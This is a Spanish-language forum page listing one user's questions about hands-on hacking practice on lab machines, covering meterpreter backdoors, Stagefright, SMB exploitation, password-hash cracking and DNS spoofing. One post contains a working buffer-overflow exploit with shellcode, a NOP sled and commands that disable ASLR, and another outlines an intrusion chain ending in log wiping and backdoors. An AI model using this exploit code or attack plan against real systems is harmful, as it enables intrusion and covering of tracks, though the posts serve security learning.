Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Ethicalsk

#46
Que tal, les comento, experimentando con dos máquinas virtuales, una atacante con Kali Linux y una víctima con Windows, a través de un exploit remoto consigo una shell del Windows, pero el exploit no se podía usar junto con una consola de meterpreter como payload, entonces lo que quiero hacer ahora es descargar a través de la pc víctima (Windows), un backdoor de meterpreter para tener una consola reversa de meterpreter y trabajar más cómodamente. Pense en descargar el backdoor a través del comando ftp de Windows, ya que es la única forma de descargar algo con un comando nativo de Windows (creo yo), entonces instalé un servidor de ftp en Kali linux y dejé el archivo .exe con el backdoor para una consola de meterpreter. Una vez que me conecto al servidor a través de ftp me pide el password y luego de eso solo me muestra lo que yo escribo, sin ninguna respuesta del servidor ftp, pruebo ejecutando quit, y no me lo toma, se me cuelga en ese momento y no me queda alternativa que cerrar la conexion remota. Lo mismo me pasó con muchos comandos, como por ejemplo el powershell, ni bien ejecuto el comando powershell, solo veo en la consola lo que yo escribo, ninguna respuesta de Windows... Aca les muestro una captura:



Después otro problema que siempre tuve fue éste (usen la barra de desplazamiento):



Me gustaría que me dijeran como evitar que ésto pase, y si no se puede evitar, alguna forma de descargar archivos en un Windows comprometido. Saludos y gracias!

MOD: Imagenes adaptadas a lo permitido.
#47
Criptografía / Duda sobre tablas rainbow
15 Diciembre 2016, 09:38 AM
Muy buenas, estuve leyendo por distintos lados sobre el funcionamiento de las tablas rainbow... Hasta ahora lo que se, es que NO son tablas de pares password_hash | password_textplain  sino de pares palabra inicial | palabra final.  El funcionamiento básicamente sería que a la palabra inicial se le aplica determinado algoritmo de hash, y al hash obtenido un algoritmo de reduccion para obtener una nueva palabra. Asi 40.000 iteraciones. Si queremos crackear X hash, tenemos que aplicar todo éste proceso de resumen/reduccion por cada entrada de la tabla, hasta que alguno de los hashes sea identico al que queremos crackear. Por cada iteración, se comprueba que la palabra reducida no sea la palabra final, en caso de que sea la palabra final, se toma la palabra inicial de la siguiente entrada, o tupla en la tabla y se repite el proceso. Tal vez esté equivocado respecto a como funciona, porque la verdad no le encuentro la utilidad a éste método, ya que a través de fuerza bruta solo tengo que ejecutar los algoritmos de resumen (hash) por cada combinacion hasta encotrar un hash identico al que quiero crackear, en cambio en las tablas rainbow, ademas de ejecutar los algoritmos de hash tambien hay que ejecutar los algoritmos de reduccion, a los cuáles no les encuentro el sentido... Es decir, generan una palabra cualquiera, cuyo hash, puede ser o no correspondiente al que busco, nadie me garantiza que lo sea, entonces si simplemente pruebo todas las combinaciones posibles, de forma incremental, estaría evitando ejecutar el algoritmo de reducción y de ésta forma obtendría más rápido la coincidencia con el hash que estoy buscando...

Espero que me entiendan y me sepan aclarar en qué estoy equivocado o qué no estoy teniendo en cuenta, ya que no entender algo me desespera. Saludos y gracias!
#48
Que tal!? Me estoy empezando a volver loco porque quiero hacer algo simple que me está haciendo dar muchas vueltas. Resulta que estaba leyendo manuales de exploit writting de corelan.be, estoy en el tercero, que te muestra un código en C que utiliza __try __except. Yo estaba acostumbrado a compilar con CodeBlocks, pero leyendo, descubrí que no tiene soporte para las excepciones, y sale un error cuando lo querés compilar... Entonces descargué el Visual Studio para Windows 7 (el SO que tengo instalado en disco), sin problema, y pude compilar perfectamente el programa. Ahora el problema lo tengo cuando quiero ejecutar ese ejecutable generado sobre WinXP (el SO que corro sobre VM), necesito ejecutarlo ahí xq las pruebas en éste caso se hacen sobre ese SO. Cuando quiero abrir el .exe me salta que no es una aplicación Win32 válida. Me aseguré que sea de 32 bits y lo es... Entonces supuse que tal vez me faltaban librerías, y empecé a descargar los Visual C++ redistributable, pero no hubo caso. Aca les muestro lo que tengo instalado en el WinXP:



Entonces me decidí por instalar el Visual Studio en Windows XP, pero cuando ejecuto el instalador me sale que no es una aplicación Win32 válida.... Ésta vez no puedo entender por qué, ya que el Visual Studio es compatible con WinXP, google y google y ésto a nadie le pasó. Probé descargar una version antigua de Visual Studio, la del 2013 creo, y ésta vez me salto éste error: "El programa especificado requiere una version de windows más reciente".

Tienen idea como puedo solucionar mi problema? O sea, hace 2 días que estoy de un lado para el otro con ésto, y lo único que quiero hacer es compilar un **** programa.

Espero que me sepan dar una mano, saludos y mil gracias
#49
Muy buenas! No estoy muy experimentado en el asunto, y supongo que algunos de ustedes si. Estuve leyendo y descubrí que para explotar vulnerabilidades en servicios desactualizados es muy importante conocer la version del SO que corre sobre la PC con el servicio vulnerable, ya que si el bug es del tipo stack, heap overflow, o algún otro, es necesario saber datos puntuales del SO, como la direccion de retorno de determinada librería, etc. Muchas veces nmap nos da buena información sobre el SO, pero a veces no puede saber con certeza, o puede dar falsos positivos. En esos casos qué decisión se supone que tome el atacante? Porque si llega a usar un payload equivocado puede llegar a sobreescribir el EIP/RIP, y que apunte a una dirección inexistente o prohibida, generando un segmentation fault, y por ende un DoS en el servicio, dejandolo sin funcionamiento hasta que se vuelva a ejecutar...

La idea que yo más o menos tengo sobre el proceso de explotación sería el siguiente (siempre teniendo en cuenta el punto de vista del atacante):
1) Descubrir las versiones de los servicios y del SO que corre en la víctima.
2) Buscar exploits para los servicios que corren.
3) Si se encuentran exploits para dichos servicios pero no tienen soporte para la versión del SO de la víctima habría que hacer ciertas modificaciones, para eso sería necesario descargar un .iso del mismo sistema operativo que tenga la víctima, correrlo sobre una VM, instalarle la misma version del servicio que la víctima tenga, y luego a través de un debbuger/desensamblador, extraer los datos valiosos sobre direcciones de memoria y esas cosas para reemplazarlas en el exploit que encontramos. En caso que no se encuentren exploits, igualmente necesitamos el .iso y el servicio que corre, y debbuguearlo para ponerlo a prueba y tratar de encontrar un 0 day.
4) Correr el exploit original/modificado/0day para obtener una shell inversa.
5) Si no se obtiene una shell con privilegios, habría que escalarlos.
6) Una vez obtenido los privilegios es hora de borrar logs y dejar backdoors para mantener el acceso.

Pero... Si el atacante no sabe con certeza el SO de la víctima, como puede planificar correctamente un ataque? Esa es mi gran duda...
#50
Muy buenas! Probé con el multi/handler de metasploit escuchando en un mismo puerto y ejecutando el mismo payload en dos máquinas virtuales, pero cuando ejecuto el payload con la primera, envío la consola inversa y el puerto asignado se me bloquea con la primer máquina virtual. Cuando ejecuto el payload en la segunda máquina, no se me abre una segunda consola en la máquina atacante...

Quería saber si había alguna forma de conseguir ésto con metaspoit, o sino ideas para codear yo mismo un handler multithreading...

Saludos y gracias!
#51
Buenas a todos, el problema que estoy afrontando esta vez es que de repente la pantalla se me tilda con lineas horizontales de distintos colores, aqui una foto:



Me pasa siempre, no la puedo usar ni 10 minutos que me vuelve a suceder... Una vez se me colgo con esa pantalla, otra vez con lineas mas verdes, motra con franjas azules....

A veces cuando intento encenderla, el CPU no hace el sonido clásico para indicar que todo anda correctamente, y directamente no veo nada en pantalla, todo negro, ni el cartel de la BIOS... Otras veces cuando la intento encender se me cuelga con la pantalla de windows antes de llegar a la pantalla celeste que dice Iniciando...

Alguna información:
-Windows 7 SP1
-AMD 64 bits, quad core
-6gb RAM DDR3
-La tengo hace mas de 4 años sin formatear
-EL cooler suele hacer mucho ruido cuando arranca, le tengo que dar un golpecito para que deje de hacer ruido
-EL procesador puede llegar a estar sucio, hace mucho que no lo limpio.
-Todo ésto me empezo a pasar ahora, no es un problema que tenga desde antes, y realmente no puedo hacer nada mientras las cosas sigan asi.

Me gustarìa que me dijeran de que se puede llegar a tratar, si puede llegar a ser un problema de hardware, alguna especie de malware o cualquier otra cosa...

Gracias desde ya. Saludos
#52
Muy buenas a todos, estuve leyendo sobre el conocido bug stagefright de android, me bajé la aplicación de ESET para verificar si mi movil es vulnerable y lo es. Quería saber si había algún modo de enviar el mp4 que me genera el python (de 2mb) gratis a mi celular por MMS...

Otra duda que tengo, ya que estamos, la única forma de que ésta vulnereabilidad sea explotable es enviándolo a través de MMS? No se puede enviar por Whatsapp y que la víctima abra el mp4 manualmenete? También probé subiendo el archivo a mi teléfono y abriendolo con un reproductor pero me sale un cartel de error diciéndome que es imposible abrirlo y no se me conecta al listener de netcat...

Saludos y gracias desde ya!
#53
que tal comunidad? estaba haciendo pentesting con la web de un amigo que resultó vulnerable a SQLi, pero los passwords estaban bien cifrados, me dijo que los paso dos veces por sha256... supongo que uso algo como ésto en su código:

sha256(sha256($pass))

Por ejemplo, usemos el password: juan87

Si lo ciframos una vez por sha256 queda: 

9a9b826753261a7f06364c25ba3f09c0b7f8fc926d6dc494aa9e2e614a64050d

Y si a éste último hash lo volvemos a cifrar con sha256 quedaría:

a5dbc50c08e468b83c5c9bf2f191091e2e3d3858bc6146ed611597a1d8893d71


Probé usar el JTR con los siguientes parámetros:

john hash.txt --wordlist=passwords.txt --format=Raw-SHA256 --salts=2

siendo hash.txt un archivo que contiene el útlimo hash
(a5dbc50c08e468b83c5c9bf2f191091e2e3d3858bc6146ed611597a1d8893d71)

y el wordlist.txt un archivo con varios passwords, entre ellos juan87 pero no funcionó...

Después intente usar éste comando:

john hash.txt --wordlist=passwords.txt --format=Raw-SHA256

(sin el --salt=2), y dentro del wordlist dejé el primero de los hashes (9a9b826753261a7f06364c25ba3f09c0b7f8fc926d6dc494aa9e2e614a64050d)

y tampoco lo identificó como la clave... Ésto último me pareció muy raro, ya que al primer hash solo bastaba pasarlo una vez por sha256 para que coincida con el segundo hash, y aun asi tampoco lo identificó...

Gracias por la colaboración!!!!


#54
Que tal gente, despues de un tiempo largo volví a probar éste famoso exploit pero ésta vez usando mi ip pública y haciendo  forwarding de lo que le llega a mi router al puerto 445 hacia el puerto 445 de un Windows XP dentro de mi red. Cuando probé el exploit me salto el error de

Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out

Despues toqueteando un poco, probé desactivar el firewall del Windows XP, y ahí si funcionó el exploit... Se ve que era eso, por defecto el puerto 445 solo acepta peticiones de hosts dentro de la subred... No tienen idea si existe alguna forma de esquivar o agregar excepciones al firewall cuando se usan exploits server side? O el firewall solo se puede bypassear con comandos dentro de un backdoor que ejecute manualmente la víctima?

Gracias por la ayuda
#55
Hola comunidad, tenía entendido que para poder aplicar fuerza bruta sobre WPA primero es necesario capturar el handshake, que incluye el hash de la contraseña... También sabía que para determinar que la contraseña sea la correcta, tiene que ser procesada y coincidir con su respectivo hash... Mi pregunta es, como se procesa? Se pasa por un algoritmo de cifrado? Se le aplica MD5, SHA, o alguno de la familia? Como se sabe que aplicar? Gracias desde ya por la ayuda. Saludos
#56
Buenas! Quería saber si estoy en lo cierto con ésto... En un ataque MITM, (llevado a cabo gracias al ARP poisoning), la PC atacante es la que realiza la consulta DNS. Es decir, si yo PC atacante me pongo entre medio de una PC victima y el router, y la PC víctima googlea www.facebook.com, yo sería el que tiene que hacer la consulta DNS para obtener la IP de facebook y recién luego de ésto hacer la petición al sitio web... Entonces hacer DNS spoofing sería simplemente no realizar la consulta y utilizar una IP que tenga en una lista de algún archivo... Cuando abrimos Ettercap y activamos el pluggin DNS spoof, lo que estamos haciendo es configurar al Ettercap para que no realice la consulta DNS y en cambio que lea el archivo etter.conf? Estoy en lo cierto en lo que digo? Otra duda ya que estamos, cuando nos conectamos  través de TOR la consulta DNS la realizamos nosotros, o sea que en los logs del servidor DNS va a figurar nuestra IP verdadera, recién luego de la consulta se empieza a conectar con los distintos nodos de la red TOR... Si estoy equivocado en algo o quieren aportar algo sobre el asunto sería muy agradecido! Quiero saber si entendí las cosas bien. Saludos!
#57
Hola gente! Que tal? El inconveniente que estoy teniendo es que no puedo redirigir un sitio web a la ip que yo haya asignado dentro del archivo host... Lo tengo asi en este momento:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97    rhino.acme.com          # source server
#       38.25.63.10 x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost

#185.37.227.76 www.youtube.com

104.24.17.24 petardas.com
104.24.17.24 www.petardas.com


La ip 104.24.17.24 es la que se corresponde con www.elhacker.net cuando le hice ping. Probé con muchas otras ips de otros sitios obtenidas con los ping pero ninguna me redirecciona, siempre me termina cargando la pagina original. Lo único que si me permite es bloquearla de ésta forma:

127.0.0.1 petardas.com

Pero solo puedo redireccionarla a localhost, y no a otro sitio web... Alguna idea?
#58
Scripting / Bash: imprimir columnas alineadas
14 Noviembre 2015, 01:49 AM
Hola que tal gente? Lo que quería era imprimir 3 valores en una misma linea de forma que queden alineados con la linea de abajo. Por ejemplo, si escribo:

for valor in 1 2 3; do
     echo "$nombre[valor]          $apellido[valor]           %DN[valor]I"
done;


La salida es:

Juan          Lopez              38192434
Rodrigo              Dominguez                          34372374234
Leonardo               Perez                           20943428323

Y yo quiero:

Juan                  Lopez                          38192434
Rodrigo            Dominguez                  34372374234
Leonardo          Perez                           20943428323

Espero que puedan ayudarme! saludos.
#59
Hola señores!! En ésta oportunidad estuve leyendo éste thread:

https://foro.elhacker.net/programacion_general/programacion_segura_buffer_overflows_by_strcpy-t95901.0.html

Hasta hace unos días solo entendía como explotar vulnereabilidades de la funcion strcpy(), y ahora estaba aprendiendo a vulnerar otras funciones, otros casos. Es todo muy similar. Para vulnerar el strcat() por ejemplo hay que tener en cuenta la primera parte del string que se concatena con la segunda parte. Si sabemos la dirección de memoria donde se almacena el string, tenemos que sumar el desplazamiento de la primera parte de la cadena digamos, para usar como dirección de retorno.

Por ejemplo, si tenemos éste código:

char buffer[64]="AAAA";
strcat(buffer, argv[1]);


Supongamos hipotéticamente que la dirección de memoria en la que se almacena buffer es 0x00000000. Entonces la dirección de retorno no puede ser 0x00000000, debería ser 0x00000004, ya que sumamos los 4 bytes de desplazamiento de las "A", porque en el código despues de concatenar vamos a tener "AAAAshellcode", y la shellcode empieza recién en 0x00000004.

Bueno, hasta aca todo genial, mi problema es cuando intento vulnerar casos usando gets() o scanf().

En primer lugar, cabe aclarar que todos los ejemplos los uso con ASLR desactivado:
echo 0 > /proc/sys/kernel/randomize_va_space

Les dejo un ejemplo de programa vulnerable:


/* Ejemplo de bof */
/* gets() peligroso */

#include <stdio.h>
int main() {
   char buffer[64];
   printf("%p\n\n",buffer);
   gets(buffer); /* Otra ves una funcion peligros */
}


(era la que estaba en el link que mandé)

Compilado de la siguiente forma:

gcc -fno-stack-protector -z execstack -o gets gets.c


Bueno, para explotarla, hice éste exploit: (la shellcode es para ejecutar /bin/dash)

#include <iostream>
#include <fstream>
using namespace std;

int main() {

   char ret[] = "\x40\xe3\xff\xff\xff\x7f";

   //29 bytes shellcode
   char shellcode[] = "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";

   //71 bytes nops - 29 shellcode = 43 nops
   char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x90\x90\x90";

   cout << "Creando exploit\n\n";
   ofstream fichero;
   fichero.open("archivo.txt");
   fichero << shellcode << nops << ret ;
   fichero.close();
   cout << "ya esta!!!\n\n";
   return 0;

}


Lo compilo:
g++ -o exploit exploit.cpp

Lo ejecuto:
./exploit

Abro el programa vulnerable con gdb:
gdb gets

Lo corro enviándole el archivo generado por el exploit:
run < archivo.txt

Y obtengo ésta salida:

process 6070 is executing new program: /bin/dash
[Inferior 1 (process 6070) exited normally]
(gdb)

Es decir, RIP se sobreescribió, la shellcode se ejecutó correctamente pero ni bien se ejecuta se cierra digamos, no puedo hacer nada, en ningun momento puedo usar la consola. Probando fuera de gdb, no me da ninguna salida, supongo que pasa lo mismo, se ejecuta y se cierra inmediatamente de forma que no puedo tomar provecho con ésta shellcode... Despues probé con una shellcode para hacer: cat /etc/passwd, y se ejecuta perfectamente tanto dentro como fuera de gdb, se muestra por consola dicho archivo.... Intentando explotar la función scanf() tuvé exactamente el mismo problema que con gets()...

Ahora la pregunta mia es, como puedo hacer para ejecutar y poder usar una terminal sin que se cierre? Tal como lo hice cuando exploté strcpy(), strcat(), etc...  Tal vez no haya que usar un archivo, sino mandar la shellcode cuando las funciones esperan que ingreses el string, pero como hago para meter una shellcode hexadecimal de esa forma?  

Desde ya muchas gracias por ayudar! Saludos.
#60
Hola informaticos! Estoy un poco cerrado de imaginación por eso recurro a ustedes para que me abran un poco la cabeza... Yo tenía entendido que una utilidad fundamental del Buffer Overflow en Linux era la de conseguir una shell de root si el programa a atacar tiene el flag de suid activado... En Windows me parece que no existe éste mecanismo, entonces por más que consiga invocar a una consola dentro del programa vulnerado, si estoy atancando sin permisos, la consola tampoco tendrá permisos.... Entonces me gustaría que me abran un poco la cabeza, denme algunas ideas de cosas utiies que puedo hacer en Windows explotando éstas vulnereabilidades, y algunas otras ideas para Linux si quieren y pueden. Saludos y gracias desde ya por visitar éste hilo y aportar!
#61
Hola informáticosl!!! Estaba tratando de seguir el clásico y básico ejercicio de buffer overflow sobre mi kali de 64 bits, éste ejercicio para ser concreto:

https://www.exploit-db.com/docs/33698.pdf

Pude explotarlo dentro de gdb como root (logrando imprimir el contenido de passwd) y luego probé con otra shellcode que ejecutaba bin dash que también funcionó (tuve la shell privilegiada).... La dirección de retorno que usaba siempre era la misma por más que abriera el programa en gdb una y otra vez... Luego probe lo mismo pero usando una consola no privilegiada y llegue a exactamente lo mismo, solo que obtuve una shell no privilegiada (hasta aqui todo normal)... El problema empezó cuando le di chmod +s bof (bof es el programa vulnerable). Entré en una shell no privilegiada, abri el gdb, busqué la dirección de memoria en la que se empezaba a apilar la shellcode y cuando reinicié el gdb para correr el programa (junto con el exploit con la dirección de retorno modificada) resulta que me tira segmentation fault... Recorrí paso por paso de vuelta y noté que cada vez que reiniciaba gdb, la shellcode se apilaba en direcciones de memoria distintas, lo cuál me imposibilitó en saber qué dirección usar como la de retorno.... Otra cosa: si quiero explotar el programa fuera del gdb, la shellcode se apila en diferentes direcciones sin importar si está activado o no el flag de suid... Me imagino que ustedes se toparon con algo de ésto... Sabrían alguna solución o método para saber que dirección de retorno usar, o alguna forma para que la shellcode se apile siempre en las mismas direcciones? Gracias desde ya!! Toda la información que necesitan para ayudarme con mi duda está en el pdf, yo seguí paso por paso de ahi... Es el ejemplo básico que encuentran en todos lados... Saludos!!!! 
#62
Hola que tal gente!!! Mi duda es la siguiente:

Poniendo como ejemplo que a través de mi portatil quiero sniffar a otra portatil víctima, yo antes pensaba que los datos de la portatil víctima eran enviados a mi notebook antes de llegar al router, y yo sería quien envía los datos a router que luego van a internet, y del router son enviados a mi nuevamente para finalmente enviárselos a la portatil víctima....

Despues de leer cosas sobre redes WiFi, note que dos tarjetas de red en modo managed no se pueden comunicar entre si... Dependen siempre del router. Sería una conexión punto a multipunto... Entonces despues de ésto me replantié un poco el traycto de los datos....

Ahora pienso que de la portatil víctima, los datos van al router, del router a mi, de mi al router, del router a internet, de internet al router, del router a mi, de mi al router y del router a la portatil víctima... Un montón de pasos!!! Traten de seguirlos y decime si estoy acertado en ésto, si hay algún paso de más, alguno de menos, o explicarme alguna que otra cosa, pero lo que si no se gasten mucho en explicarme como se modifica la tabla ARP porque eso lo entiendo y lo observo a menudo con el wireshark y con arp -a... Bueno gracias desde ya!!! Saludos.
#63
Hola que tal gente! Abro éste tema para preguntarles según ustedes a partir de que momento un newbie interesado en la seguridad informatica pasa a ser lo suficientemente experimentado como para ser llamado sombrero blanco/negro o cracker...

Para mi punto de vista ninguna persona que solo sepa usar software, herramientas de hacking hechas por otras personas pueden ser llamadas white hat... Por más que sepan usar casi todas las que vienen en Kali... Ojo, no menosprecio a esa gente, para mi punto de vista está genial arrancar experimentando con herramientas ya hechas... Ahora, el white hat para mi es un hacker que sabe de programación, que crea sus propias herramientas, no digo que cree todo lo que usa, pero si algunas heramientas... Y entiendan a fondo como estén hechas... O descubrir vulnereabilidades y ser capaz de crear propios exploits... Pero a partir de que momento un newbie merece ser conocido como white hat? Despues de crear su primera herramienta? Despues de crear unas cuantas? 

Un black hat, para mi es un hacker, un programador que crea sus propios exploits al igual que el white hat, a diferencia que éste último los publica para colaborar con la seguridad, y de paso ser reconocidos, ya que cualquiera que busque y use su exploit verá su nombre... Gana reconocimiento... En cambio el black hat opta por quedarselo para el mismo, y tenerlo como 0-day hasta que otro descubra la vulnereabiliad y sea parchada... Prefieren tener su herramienta para hacer maldades, infiltrarse, robar datos, etc, sacrificando el ser conocido, el llevar su nombre en un exploit de db por ejemplo...  Pero a partir de que momento un newbie merece ser conocido como black hat? Despues de crear su primer exploit-0day? Despues de crear unas cuantos? 

Despues un cracker, es una persona que tiene que saber de ingeniería inversa... De assembly, de bajo nivel, de sistemas operativos, como funcionan... Y saber como romper la seguridad de los programas pagos para saltearse sus restricciones... Pero a partir de que momento un newbie merece ser conocido cracker? Despues de haber crackeado un programa? Despues de haber crackeado cuantos? 

Ustedes que piensan de ésto? Todos van a tener su punto de vista, y no va a haber nadie que tenga la completa razón ni nadie que no la tenga.. Porque ésto es bastante relativo...

Bueno saludos!
#64
Hola gente! Bueno ésta es mi duda... Nunca supe como conectarme a través de WPS... Se que se puede conectar a través de un pin que está detrás del router (el que viene por defecto), tambien se puede cambiar, y que para hacerlo funcionar hay que apretar el botón de WPS que viene con el router... Disculpen por ser ignorante, pero yo lo que estoy probando es conectarme desde mi celular introduciendo el pin que viene por defecto en lugar de la contraseña WPA2, luego de haber presionado una vez el botón WPS del router... No hay caso. Cómo funciona ésto?? Otro detalle a mencionar es que el botón de WPS si lo dejas presionado por largo tiempo, resetea el router, asi que yo lo presioné solo una vez y lo solté inmediatamente... Gracias desde ya por su atención! Saludos!